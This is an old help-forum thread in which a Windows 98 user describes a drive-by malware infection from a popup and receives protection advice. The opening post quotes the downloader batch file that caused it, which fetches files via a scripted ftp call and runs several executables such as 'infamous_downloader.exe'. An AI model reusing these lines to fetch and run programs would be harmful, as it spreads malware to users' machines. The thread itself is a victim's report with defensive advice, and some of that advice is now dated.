DOS Batch file from hell!!

Today while surfing the net with my Windows 98SE Compaq Armada 1700 laptop, I
encountered a website that displayed a popup add, that asked me a question with
two possible answers. I foolishly clicked one of the answers instead of
clicking away. After of which my computer screen turned blank, and then
started to flash after of which I received a DOS prompt, while something was
using the DOSFTP environment to connect to a site and download some apps and
install software on my computer. Its like my Computer was being controlled!!
I quickly ejected my PC network card from my laptop, and my computer froze. I
restarted and a bunch of .exe icons were on my desktop. I attempted to delete
all of them, but not all could be removed either from Windows or a DOS session
within Windows. It seemed the only way to rid the newely installed .exe files
was to reboot to the DOS command prompt. Once in a pure DOS session, I was
able to remove the .exe apps from my desktop.

It seems that this hassle was triggered by the batch file below. This batch
file executes even if you do not open it. I moved the file to the recycle bin,
and while moving it back to my PC it executed again.

So in order to disable it, I had to boot into a DOS prompt.

if not exist C:\WINDOWSstatuslog ftp -s:o
if exist install2.exe install2.exe
if exist infamous_downloader.exe infamous_downloader.exe
if exist 0021-bdl94126.EXE 0021-bdl94126.EXE
if exist CS4P028.exe CS4P028.exe
if exist silent.exe silent.exe

For future reference what should I do, to protect myself from problems like
this? I know I could try not clicking on anypopups, but lets face the facts.
There are some websites that auto-install software in the background when I
visit their site. Their does not seem to be a easy way around this. Heck,
I've even had sites auto-install files when using my Macintosh. But the files
were unable to execute since the Mac OS cannot read .exe files.

Thanks for any support;

Personally I do not know how people with newer floppyless/DOSless laptops
survive. How do they solve these kinds of problems, since they cannot boot
into a pure DOS mode, and since newer laptops lack a floppy disk drive, neither
can they boot into a DOS session easily. I personally would think twice before
purchasing a XP laptop.

John
5 answers Last reply
More about batch file hell

    On 20 May 2004 04:31:52 GMT, coolwater0009@aol.com (Coolwater0009)
    wrote:

    >For future reference what should I do, to protect myself from problems like
    >this? I know I could try not clicking on anypopups, but lets face the facts.
    >There are some websites that auto-install software in the background when I
    >visit their site. Their does not seem to be a easy way around this. Heck,
    >I've even had sites auto-install files when using my Macintosh. But the files
    >were unable to execute since the Mac OS cannot read .exe files.
    >
    >Thanks for any support;

    Step 1: don't use IE. Swiss cheese has less holes!
    Step 2: download a decent browser like Mozila or Opera. Both has
    built in pop up blocker
    Step 3: post the link to the site where that pop up might have
    happened

    >Personally I do not know how people with newer floppyless/DOSless laptops
    >survive. How do they solve these kinds of problems, since they cannot boot
    >into a pure DOS mode, and since newer laptops lack a floppy disk drive, neither
    >can they boot into a DOS session easily. I personally would think twice before
    >purchasing a XP laptop.

    A prayer. ;-) Actually even with XP, you can still boot into
    DOS-esque mode by using XP startup CD and entering the repair console.
    Or using Win 98 boot CD (not the 98 install CD) to get DOS mode on any
    laptop.

    Also it helps if you have firewall running as well as up to date
    antivirus program. Using Lavasoft Ad-ware and Spybot once in a while
    will keep spywares and trojans from sneaking into your system.

    As a last resort, you could buy a Mac laptop. SPyware and such
    program would still end up on your hard drive but it won't do anything
    because it can't run in MacOS at all.
    --
    To reply, replace digi.mon with tds.net

    Uncheck the two "Enable Install on Demand" options in Internet Properties,
    Advanced.
    -E

    "Coolwater0009" <coolwater0009@aol.com> wrote in message
[...]

    One way to protect yourself is to install a good pop-up blocker. Yahoo has
    an excellent one as part of their Companion toolbar. It's free. Go to:
    http://www.yahoo.com
    and download and install it. It's very configurable and allows you to
    sprcify from what websites you DO want to allow pop-ups. I use it on all my
    PCs. On this new Presario S5200CL, it has blocked 191 pop-up ads in the week
    I've had the PC online.
    HH

> [...]
    Heck,
    > I've even had sites auto-install files when using my Macintosh. But the
    files
    > were unable to execute since the Mac OS cannot read .exe files.
    >
    > Thanks for any support;
    >
    > Personally I do not know how people with newer floppyless/DOSless laptops
    > survive. How do they solve these kinds of problems, since they cannot
    boot
    > into a pure DOS mode, and since newer laptops lack a floppy disk drive,
    neither
    > can they boot into a DOS session easily. I personally would think twice
    before
    > purchasing a XP laptop.
    >
    > John

    >As a last resort, you could buy a Mac laptop. SPyware and such
    >program would still end up on your hard drive but it won't do anything

    I have a Mac desktop. Yes as I mentioned such files have been downloaded, but
    because of the mac nature, they were never executed.

    Bianca,
    you might try trend micro housecall free online scan. it is free it
    is available at: http://housecall.trendmicro.com/ .
    hope this helps,
    terry

Compaq Computers